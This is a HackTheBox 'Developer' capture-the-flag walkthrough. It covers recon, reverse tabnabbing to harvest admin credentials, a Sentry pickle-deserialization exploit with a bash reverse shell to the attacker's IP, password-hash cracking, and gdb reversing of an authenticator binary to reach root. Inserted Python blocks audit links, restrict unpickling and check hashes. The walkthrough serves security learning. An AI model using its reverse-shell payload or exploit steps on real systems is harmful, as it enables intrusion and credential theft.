
HackTheBox – Developer Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -p- -T4 10.10.11.103

output: 22, 80

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -sC -sV -p22,80 10.10.11.103

http://developer.htb

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -u http://developer.htb

http://developer.htb/accounts/signup/

┌──(rootkali)-[/home/kali/Downloads]

└─# unzip phished_list.zip

┌──(rootkali)-[/home/kali/Downloads]

└─# unzip phished_credentials.xlsx

We get the flag with a quick grep for a common flag scheme.

┌──(rootkali)-[/home/kali/Downloads]

└─# grep -iRe '{.*}'

Flag: DHTB{H1dD3N_C0LuMn5_FtW}

Going to our profile we see that we now have a walkthrough submitted. Checking the page source for the link, we see that clicking on it opens a new tab with target="_blank". This makes it susceptible to tabnabbing, since the opened page can change the location of the parent tab.
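As an added defensive check, not part of the original writeup, the following Python audits HTML for exactly the weakness just described: anchors that open a new tab with target="_blank" but carry no rel="noopener" (or "noreferrer", which implies it), so the opened page keeps a window.opener handle to the tab that opened it. The sample HTML is constructed for the example.

```python
"""Audit HTML for new-tab links that leave window.opener reachable.

Added example, not code from the writeup or from developer.htb. A link with
target="_blank" and no rel="noopener" (or "noreferrer", which implies it) hands
the opened page a window.opener reference, and that page can set
window.opener.location to redirect the tab that opened it: reverse tabnabbing.
Current browsers default to noopener for _blank, but an explicit rel attribute
covers older clients and makes the intent reviewable.
"""
from html.parser import HTMLParser

# Constructed sample page in the shape of a profile page listing submitted links.
SAMPLE_HTML = """
<html><body>
<h1>Submitted walkthroughs</h1>
<ul>
  <li><a href="https://example.com/walkthrough/1" target="_blank">Walkthrough 1</a></li>
  <li><a href="https://example.com/rules" target="_blank" rel="noopener noreferrer">Rules</a></li>
  <li><a href="/profile">Profile</a></li>
</ul>
</body></html>
"""


class BlankTargetAuditor(HTMLParser):
    """Collect <a target="_blank"> tags whose rel lacks noopener/noreferrer."""

    def __init__(self):
        super().__init__()
        self.findings = []   # (href, rel) pairs that need fixing
        self.safe = []       # hrefs that already sever the opener link

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attributes = {name.lower(): (value or "") for name, value in attrs}
        if attributes.get("target", "").lower() != "_blank":
            return
        rel = attributes.get("rel", "")
        rel_tokens = {token.lower() for token in rel.split()}
        href = attributes.get("href", "")
        if rel_tokens & {"noopener", "noreferrer"}:
            self.safe.append(href)
        else:
            self.findings.append((href, rel))


def audit_links(html: str):
    """Return [(href, rel), ...] for every new-tab link that needs rel="noopener"."""
    parser = BlankTargetAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


def hardened_rel(rel: str) -> str:
    """Return the rel value a fix should write: existing tokens plus noopener noreferrer."""
    tokens = rel.split()
    for needed in ("noopener", "noreferrer"):
        if needed not in (t.lower() for t in tokens):
            tokens.append(needed)
    return " ".join(tokens)


if __name__ == "__main__":
    for href, rel in audit_links(SAMPLE_HTML):
        print(f'{href}: rel="{rel}" -> rel="{hardened_rel(rel)}"')
```

Run against a rendered page (for instance the saved HTML of the profile view), the audit lists every link a fix needs to touch; the fix itself is adding the missing rel tokens, and the same check belongs in a template linter so new user-supplied links cannot reintroduce the issue.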

After about a minute we get a hit on our listener with a Firefox user agent, which means the link is probably being checked in a browser.

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 -m http.server 80

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 -m http.server

┌──(rootkali)-[/home/kali/Downloads]

└─# tcpdump -i tun0 -nt -A

Link of walkthrough : http://10.10.14.55/evil.html

In the tcpdump output we get this.

Voila, the credentials are (admin:SuperSecurePassword@HTB2021). Armed with the credentials, we can now log in to Django administration.

http://developer.htb/admin/login/?next=/admin/

Clicking on Sites here, we can see Django is running 2 sites.

I'd better add developer-sentry.developer.htb to /etc/hosts as well. This is what the Sentry site looks like.

http://developer-sentry.developer.htb/auth/login/sentry/

Click on member.

We can see that jacob@developer.htb is a member of the site. Perhaps the password SuperSecurePassword@HTB2021 will work for this username as well?

Authenticated Remote Code Execution in Sentry

The first thing I notice is that this Sentry is old. The current Sentry release is 21.8.0!!!

Oh boy have I the right exploit for this. The following Python code will help to generate the poisonous pickle for deserialization in the data field of an audit log entry.

https://www.exploit-db.com/exploits/50318

https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf

┌──(rootkali)-[/home/kali/Downloads]

└─# python2 exploit.py "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.55/1234 0>&1'"

Output:

eJwVi0EKgCAQAO/7Ck/pJVdTO/qGqBeoCQVRS1bvT2EOw8Ck8ka6r5RLgemifAJpEOKgARaOcT8xhrJxIANh4X2qZpu1yvqd+Y7hmj98EqFWsmGlc6gHY5nyna6Dg/DMNIL8AejnHXE=

http://developer-sentry.developer.htb/admin/sentry/auditlogentry/add/

Hit Save and you’ll see your shell.
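The root cause here is that the audit log's data field is unpickled on read, and pickle.loads() will resolve and call any module.attribute global named in the stream. As an added example from the defender's side (not code from the writeup, the exploit, or Sentry), the following Python shows the documented way to restrict that lookup, pickle.Unpickler.find_class(), and how a plain-data allow-list rejects anything else; the pickled samples are constructed and benign.

```python
"""Refuse to unpickle anything that is not plain data.

Added example, not from the writeup or from Sentry. A pickled field that an
admin-level user can write is a code-execution sink wherever it is read,
because the GLOBAL/STACK_GLOBAL opcodes make the loader import and call
arbitrary callables. pickle.Unpickler.find_class() is the hook every such
lookup goes through, so overriding it with an allow-list turns an unknown
global into a load error instead of a function call. Not using pickle for
stored data at all (JSON below) is the stronger fix.
"""
import collections
import io
import json
import pickle

# Globals a plain-data pickle can legitimately reference (older protocols
# spell set/frozenset/bytearray as builtins globals). Everything else is refused.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "bytearray"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"global {module}.{name} is not allowed in stored data"
        )


def restricted_loads(blob: bytes):
    """pickle.loads() replacement that only yields plain data structures."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_load_audit_data(blob: bytes):
    """Return (True, value) or (False, reason); never raises, so callers can log and drop."""
    try:
        return True, restricted_loads(blob)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# Constructed samples. Plain dicts, lists and strings pickle without any global.
PLAIN = pickle.dumps({"actor": "jacob", "event": "member.add", "ids": [1, 2]})
# An OrderedDict pickles as a reference to collections.OrderedDict, which is
# outside the allow-list, so it is refused even though it is harmless. That is
# the intended trade-off: the loader never has to judge which callables are safe.
NEEDS_GLOBAL = pickle.dumps(collections.OrderedDict(a=1))


def json_roundtrip(value):
    """The preferable design: a data format with no code-execution path at all."""
    return json.loads(json.dumps(value))


if __name__ == "__main__":
    print(safe_load_audit_data(PLAIN))
    print(safe_load_audit_data(NEEDS_GLOBAL))
```

The allow-list approach is a containment measure for data you cannot migrate yet; where the schema is under your control, store the field as JSON so that reading it cannot execute anything regardless of who wrote it.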

www-data@developer:/var/sentry$ cd /etc

www-data@developer:/etc$ cd sentry

www-data@developer:/etc/sentry$ cat sentry.conf.py

www-data@developer:/etc/sentry$ psql sentry sentry -h localhost -W

password : SentryPassword2021

\d+

select * from auth_user;

Since karl is the admin and also a user on the machine, we try to crack his password hash with hashcat first, and are successful.

┌──(rootkali)-[/home/kali/Downloads]

└─# hashcat -m 10000 -O hash rockyou.txt

Password: insaneclownposse

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh karl@developer.htb

karl@developer:~$ file /root/.auth/authenticator

┌──(rootkali)-[/home/kali/Downloads/test]

└─# scp karl@developer.htb:/root/.auth/authenticator .

https://github.com/pwndbg/pwndbg

┌──(rootkali)-[/home/kali/Downloads/test]

└─# gdb authenticator

pwndbg> start

pwndbg> b *0x55555555bfec

pwndbg> c

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

From the output above we copy this address:

0x555555582df0

Back at the password prompt, enter 123456.

Now delete all the previously set break points.

pwndbg> d br

pwndbg> b *0x555555582df0

Now run once again

pwndbg> r

pwndbg> c

Here simply press enter

pwndbg> r

pwndbg> s

Address : 0x55555555b204

Now again delete the break point

pwndbg> d br

pwndbg> b *0x55555555b204

pwndbg> r

pwndbg> s

pwndbg> n

pwndbg> d br

pwndbg> b *0x55555555b231

pwndbg> r

To step into this function use 's'.

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Now we can finally see the call instruction.

Nothing interesting here: in this call rbx is used as the pointer register, but rbx holds nothing useful, so we keep stepping to find another call.

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Here we can see something interesting: a call to <std::io::stdio::Stdin::read_line>.

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> d br

pwndbg> b *0x55555555b876

pwndbg> r

pwndbg> s

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

pwndbg> n

Concentrate on the call to <crypto::aes::ctr>.

Here we can see the crypto being used is AES.

pwndbg> d br

pwndbg> b *0x55555555b936

pwndbg> r

Once we enter 123456 as the password, the registers are populated. Now we check their contents in hex.

pwndbg> hex $rax

pwndbg> hex $rcx

pwndbg> hex $rsi

Search : cyberchef aes

Now we know the cipher is AES and the mode is CTR.

https://gchq.github.io/CyberChef/#recipe=AES_Encrypt(%7B'option':'UTF8','string':'hello'%7D,%7B'option':'Hex','string':''%7D,'','','',%7B'option':'Hex','string':'undefined'%7D)&input=VGVzdA

These are the inputs:

AES Encrypt:

a3 e8 32 34  5c 79 91 61  9e 20 d4 3d  be f4 f5 d5

KEY:

76 1f 59 e3  d9 d2 95 9a  a7 98 55 dc  06 20 81 6a

Input:

fe 1b 25 f0  80 6a 97 ca  78 80 fd 58  fc 5c 20 23 6c a2 db d0  e5 02 b5 fa  eb c0 af 3a  9f 27 15 2c

Here we get the output "RustForSecurity@Developer@2021:)".
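Two secret-storage designs appear in this writeup: Django's auth_user table holds pbkdf2_sha256 hashes (the hashcat -m 10000 step above), which can only be attacked by guessing at a cost of one PBKDF2 run per guess, while the authenticator binary keeps an AES-CTR ciphertext next to the key and nonce that decrypt it, so reading those bytes from registers recovers the password outright. As an added example, not code from the writeup, from Django or from the authenticator, the following Python verifies a password against Django's hash format with a constant-time compare and audits a set of rows for weak work factors; the rows and passwords are constructed.

```python
"""Verify passwords against Django-style PBKDF2 hashes and audit their work factor.

Added example, not code from the writeup, from Django or from the authenticator
binary. Format (as hashcat mode 10000 expects it):
    pbkdf2_sha256$<iterations>$<salt>$<base64 digest>
Recovering a password stored this way means guessing, at <iterations>
HMAC-SHA256 evaluations per guess. A reversible scheme like the authenticator's
embedded AES-CTR ciphertext has no such cost once the key material is read.
"""
import base64
import hashlib
import hmac
import secrets

ALGORITHM = "pbkdf2_sha256"
MIN_ITERATIONS = 600_000  # Django 4.2's default; treat anything lower as stale


def make_hash(password: str, iterations: int = MIN_ITERATIONS, salt: str = "") -> str:
    """Encode a password in Django's pbkdf2_sha256 format (random salt by default)."""
    salt = salt or secrets.token_urlsafe(16)  # URL-safe alphabet never contains '$'
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"{ALGORITHM}${iterations}${salt}${base64.b64encode(digest).decode()}"


def check_password(password: str, encoded: str) -> bool:
    """Constant-time verification; a malformed or foreign hash simply fails."""
    try:
        algorithm, iterations, salt, b64digest = encoded.split("$", 3)
        expected = base64.b64decode(b64digest)   # binascii.Error is a ValueError
        rounds = int(iterations)
    except ValueError:
        return False
    if algorithm != ALGORITHM:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), rounds)
    # compare_digest does not stop at the first differing byte
    return hmac.compare_digest(candidate, expected)


def weak_hashes(rows, minimum: int = MIN_ITERATIONS):
    """Return usernames whose stored hash is not pbkdf2_sha256 or uses too few rounds.

    rows: iterable of (username, encoded_hash), as a SELECT on auth_user would yield.
    """
    weak = []
    for username, encoded in rows:
        parts = encoded.split("$", 3)
        if (len(parts) != 4 or parts[0] != ALGORITHM
                or not parts[1].isdigit() or int(parts[1]) < minimum):
            weak.append(username)
    return weak


# Constructed rows: a low-round hash, a current one, and a legacy md5 hasher entry.
SAMPLE_ROWS = [
    ("karl", make_hash("constructed-password-1", 1000, "saltsalt")),
    ("jacob", make_hash("constructed-password-2", MIN_ITERATIONS, "saltsalt")),
    ("svc", "md5$abc$0123456789abcdef0123456789abcdef"),
]

if __name__ == "__main__":
    print("weak:", weak_hashes(SAMPLE_ROWS))
```

The iteration count is the only knob that raises the attacker's cost per guess, which is why auditing it across the user table matters: a hash cracked from rockyou in minutes at 1,000 rounds costs hundreds of times more at Django's current default.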

Key:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali

karl@developer:~$ sudo /root/.auth/authenticator

Enter your password to access the super user:

RustForSecurity@Developer@2021:)

Enter your SSH public key in now:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i /root/.ssh/id_rsa root@developer.htb

Hi, I’m saksham dixit
